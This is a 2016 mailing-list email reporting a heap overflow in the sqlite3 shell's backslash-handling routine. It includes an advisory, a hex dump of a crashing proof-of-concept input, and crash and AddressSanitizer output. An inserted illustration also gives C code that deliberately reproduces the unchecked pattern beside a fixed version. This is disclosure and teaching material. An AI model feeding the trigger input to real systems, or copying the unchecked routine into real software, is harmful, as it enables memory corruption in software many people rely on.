Dear Sqlite team,

I hope this email finds you well.

I'd like to report a heap overflow, please find an advisory attached to
this email.

Best regards,

j-
---------------------------------------------------------------------------
*                                                                         *
*                   Sqlite3 heap overflow vulnerability                   *
*                                                                         *
---------------------------------------------------------------------------

--[ Vulnerability summary:

    Date reported to vendor: 27 May 2016
    CVE : Not yet
    Class: Heap overflow

--[ Synopsis:

    A heap overflow has been identified in sqlite3.
    Version tested : 3.8.9 2015-03-23 21:32:50 0ee2d38deb35aefc55395e86984a9a773caf6218

--[ Vulnerability details:

    The resolve_backslashes() function is subject to a heap corruption
    vulnerability when scanning an allocated buffer for a backslash. On
    finding one, the function reads the corresponding value (possibly located
    past the end of the valid heap chunk) and then writes the resolved value
    back in place, potentially corrupting the heap.
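Added illustration, not SQLite's shell.c and not part of the original advisory: the two routines below model the pattern described above on a toy escape syntax (only \n, \t and \\ are handled). The names unescape_unchecked, unescape_checked and run_in_sentinel_buffer are hypothetical. The unchecked variant assumes a byte always follows a backslash, so a line ending in a backslash makes it copy the NUL terminator and continue scanning past the string; the checked variant refuses to treat a trailing backslash as an escape. The harness places a known sentinel byte after the terminator so that the overrun stays inside memory the program owns and is visible as a stop index beyond the string length.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical unchecked variant modelling the flaw the advisory describes
 * (not SQLite's resolve_backslashes()). After a backslash it unconditionally
 * consumes the next byte. If the backslash is the last character of the line,
 * that byte is the NUL terminator: the loop copies it, steps over it, and
 * keeps reading whatever memory follows the string. In the real shell that
 * memory is the end of a heap chunk; here it is a sentinel we own.
 * Returns the index at which the scan stopped. */
static size_t unescape_unchecked(char *z){
  size_t i, j;
  char c;
  for(i = j = 0; (c = z[i]) != 0; i++, j++){
    if( c == '\\' ){
      c = z[++i];                 /* no check that a byte follows */
      if( c == 'n' ) c = '\n';
      else if( c == 't' ) c = '\t';
      else if( c == '\\' ) c = '\\';
    }
    z[j] = c;                     /* in-place rewrite, j <= i */
  }
  z[j] = 0;
  return i;
}

/* Checked variant: a backslash is only an escape when a byte follows it, so a
 * trailing backslash is copied literally and the scan stops at the terminator. */
static size_t unescape_checked(char *z){
  size_t i, j;
  char c;
  for(i = j = 0; (c = z[i]) != 0; i++, j++){
    if( c == '\\' && z[i + 1] != 0 ){
      c = z[++i];
      if( c == 'n' ) c = '\n';
      else if( c == 't' ) c = '\t';
      else if( c == '\\' ) c = '\\';
    }
    z[j] = c;
  }
  z[j] = 0;
  return i;
}

/* Harness: copy `input` into a heap buffer laid out as
 *   <input bytes> NUL 'Z' NUL
 * so that an overrun past the terminator lands on the sentinel 'Z' and the
 * second NUL, keeping the demonstration inside memory we allocated. A stop
 * index greater than strlen(input) means the routine read past the string.
 * The processed string is copied to `out` when it is non-NULL. */
static size_t run_in_sentinel_buffer(size_t (*fn)(char *), const char *input,
                                     char *out, size_t outsz){
  size_t n = strlen(input);
  char *buf = malloc(n + 3);
  if( buf == NULL ) return 0;
  memcpy(buf, input, n);
  buf[n] = 0;
  buf[n + 1] = 'Z';
  buf[n + 2] = 0;
  size_t stop = fn(buf);
  if( out != NULL ) snprintf(out, outsz, "%s", buf);
  free(buf);
  return stop;
}

int main(void){
  const char *line = "ab\\";      /* constructed input: trailing backslash */
  char out[32];
  size_t stop;

  stop = run_in_sentinel_buffer(unescape_unchecked, line, out, sizeof out);
  printf("unchecked: stopped at index %zu for a %zu-byte string -> %s\n",
         stop, strlen(line),
         stop > strlen(line) ? "read past the terminator" : "ok");

  stop = run_in_sentinel_buffer(unescape_checked, line, out, sizeof out);
  printf("checked:   stopped at index %zu, result \"%s\"\n", stop, out);
  return 0;
}
```

Under AddressSanitizer the unchecked variant fails in the same way the report above shows when the sentinel is removed and the buffer is sized exactly to the string: a one-byte READ immediately to the right of the allocation. The one-line guard in the checked variant is the kind of bound that closes it.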

--[ Exploitability:

     The vulnerability can consistently be triggered using the PoC reproduced
     below.
     Successful exploitation is heap allocator dependent.

--[ Timeline:

    27 May 2016 : Vulnerability reported to vendor.


--[ PoC:

jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc1.txt 
0000000: 2e20 696e 0a2e 6920 697b 0a2e 696e 0a2e  . in..i i{..in..
0000010: 2078 1445 434c 5372 7328 aa6f 0000 036e   x.ECLSrs(.o...n
0000020: 0a2e 2078 1445 434c 5372 5c              .. x.ECLSr\
jbrossard@jbrossard-wsl3:~$ 


jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ sqlite3 < /tmp/poc/poc1.txt
Error: unknown command or invalid arguments:  "xECLSrs(�o.". Enter ".help" for help
*** glibc detected *** sqlite3: free(): invalid next size (fast): 0x000000000104bd50 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7db26)[0x7f5e8bc0eb26]
sqlite3[0x40528a]
sqlite3[0x402709]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7f5e8bbb276d]
sqlite3[0x40299d]
======= Memory map: ========
00400000-0040b000 r-xp 00000000 fc:01 1708692      /usr/bin/sqlite3
0060a000-0060b000 r--p 0000a000 fc:01 1708692      /usr/bin/sqlite3
0060b000-0060c000 rw-p 0000b000 fc:01 1708692      /usr/bin/sqlite3
01033000-01054000 rw-p 00000000 00:00 0            [heap]
7f5e8acd0000-7f5e8ace6000 r-xp 00000000 fc:01 2493899      /lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8ace6000-7f5e8aee5000 ---p 00016000 fc:01 2493899      /lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8aee5000-7f5e8aee6000 r--p 00015000 fc:01 2493899      /lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8aee6000-7f5e8aee7000 rw-p 00016000 fc:01 2493899      /lib/x86_64-linux-gnu/libgcc_s.so.1
7f5e8aee7000-7f5e8aefe000 r-xp 00000000 fc:01 2504371      /lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8aefe000-7f5e8b0fd000 ---p 00017000 fc:01 2504371      /lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8b0fd000-7f5e8b0fe000 r--p 00016000 fc:01 2504371      /lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8b0fe000-7f5e8b0ff000 rw-p 00017000 fc:01 2504371      /lib/x86_64-linux-gnu/libnsl-2.15.so
7f5e8b0ff000-7f5e8b101000 rw-p 00000000 00:00 0
7f5e8b101000-7f5e8b119000 r-xp 00000000 fc:01 2498365      /lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b119000-7f5e8b319000 ---p 00018000 fc:01 2498365      /lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b319000-7f5e8b31a000 r--p 00018000 fc:01 2498365      /lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b31a000-7f5e8b31b000 rw-p 00019000 fc:01 2498365      /lib/x86_64-linux-gnu/libresolv-2.15.so
7f5e8b31b000-7f5e8b31d000 rw-p 00000000 00:00 0
7f5e8b31d000-7f5e8b348000 r-xp 00000000 fc:01 2494807      /lib/libnss_centrifydc.so.2
7f5e8b348000-7f5e8b547000 ---p 0002b000 fc:01 2494807      /lib/libnss_centrifydc.so.2
7f5e8b547000-7f5e8b549000 rw-p 0002a000 fc:01 2494807      /lib/libnss_centrifydc.so.2
7f5e8b549000-7f5e8b56b000 r-xp 00000000 fc:01 2490475      /lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b56b000-7f5e8b76b000 ---p 00022000 fc:01 2490475      /lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b76b000-7f5e8b76f000 r--p 00022000 fc:01 2490475      /lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b76f000-7f5e8b770000 rw-p 00026000 fc:01 2490475      /lib/x86_64-linux-gnu/libtinfo.so.5.9
7f5e8b770000-7f5e8b772000 r-xp 00000000 fc:01 2493944      /lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b772000-7f5e8b972000 ---p 00002000 fc:01 2493944      /lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b972000-7f5e8b973000 r--p 00002000 fc:01 2493944      /lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b973000-7f5e8b974000 rw-p 00003000 fc:01 2493944      /lib/x86_64-linux-gnu/libdl-2.15.so
7f5e8b974000-7f5e8b98c000 r-xp 00000000 fc:01 2504418      /lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8b98c000-7f5e8bb8b000 ---p 00018000 fc:01 2504418      /lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8bb8b000-7f5e8bb8c000 r--p 00017000 fc:01 2504418      /lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8bb8c000-7f5e8bb8d000 rw-p 00018000 fc:01 2504418      /lib/x86_64-linux-gnu/libpthread-2.15.so
7f5e8bb8d000-7f5e8bb91000 rw-p 00000000 00:00 0
7f5e8bb91000-7f5e8bd45000 r-xp 00000000 fc:01 2498744      /lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bd45000-7f5e8bf44000 ---p 001b4000 fc:01 2498744      /lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bf44000-7f5e8bf48000 r--p 001b3000 fc:01 2498744      /lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bf48000-7f5e8bf4a000 rw-p 001b7000 fc:01 2498744      /lib/x86_64-linux-gnu/libc-2.15.so
7f5e8bf4a000-7f5e8bf4f000 rw-p 00000000 00:00 0
7f5e8bf4f000-7f5e8bf88000 r-xp 00000000 fc:01 2490611      /lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8bf88000-7f5e8c188000 ---p 00039000 fc:01 2490611      /lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8c188000-7f5e8c18a000 r--p 00039000 fc:01 2490611      /lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8c18a000-7f5e8c190000 rw-p 0003b000 fc:01 2490611      /lib/x86_64-linux-gnu/libreadline.so.6.2
7f5e8c190000-7f5e8c191000 rw-p 00000000 00:00 0
7f5e8c191000-7f5e8c22f000 r-xp 00000000 fc:01 1710926      /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c22f000-7f5e8c42f000 ---p 0009e000 fc:01 1710926      /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c42f000-7f5e8c431000 r--p 0009e000 fc:01 1710926      /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c431000-7f5e8c433000 rw-p 000a0000 fc:01 1710926      /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f5e8c433000-7f5e8c434000 rw-p 00000000 00:00 0
7f5e8c434000-7f5e8c456000 r-xp 00000000 fc:01 2508685      /lib/x86_64-linux-gnu/ld-2.15.so
7f5e8c629000-7f5e8c62e000 rw-p 00000000 00:00 0
7f5e8c652000-7f5e8c656000 rw-p 00000000 00:00 0
7f5e8c656000-7f5e8c657000 r--p 00022000 fc:01 2508685      /lib/x86_64-linux-gnu/ld-2.15.so
7f5e8c657000-7f5e8c659000 rw-p 00023000 fc:01 2508685      /lib/x86_64-linux-gnu/ld-2.15.so
7ffebc726000-7ffebc747000 rw-p 00000000 00:00 0            [stack]
7ffebc761000-7ffebc763000 r-xp 00000000 00:00 0            [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0    [vsyscall]
Aborted (core dumped)
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ /home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan < /tmp/poc/poc1.txt
Usage: .import FILE TABLE
=================================================================
==2443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf30032ec at pc 0x806573c bp 0xffdd5d58 sp 0xffdd5d4c
READ of size 1 at 0xf30032ec thread T0
    #0 0x806573b in resolve_backslashes /home/jbrossard/lab/sqlite3/build/../src/shell.c:1946
    #1 0x8083183 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:2614
    #2 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #3 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #4 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
    #5 0x8065148 (/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148)

0xf30032ec is located 0 bytes to the right of 300-byte region [0xf30031c0,0xf30032ec)
allocated by thread T0 here:
    #0 0xf72b7654 in __interceptor_realloc ../../../../../libsanitizer/asan/asan_malloc_linux.cc:93
    #1 0x806c16b in local_getline /home/jbrossard/lab/sqlite3/build/../src/shell.c:451
    #2 0x8095a7c in one_input_line /home/jbrossard/lab/sqlite3/build/../src/shell.c:491
    #3 0x8095a7c in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4060
    #4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #5 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jbrossard/lab/sqlite3/build/../src/shell.c:1946 resolve_backslashes
Shadow bytes around the buggy address:
  0x3e600600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e600610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e600620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e600630: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x3e600640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x3e600650: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
  0x3e600660: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x3e600670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x3e600680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x3e600690: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x3e6006a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==2443==ABORTING
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ 

_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
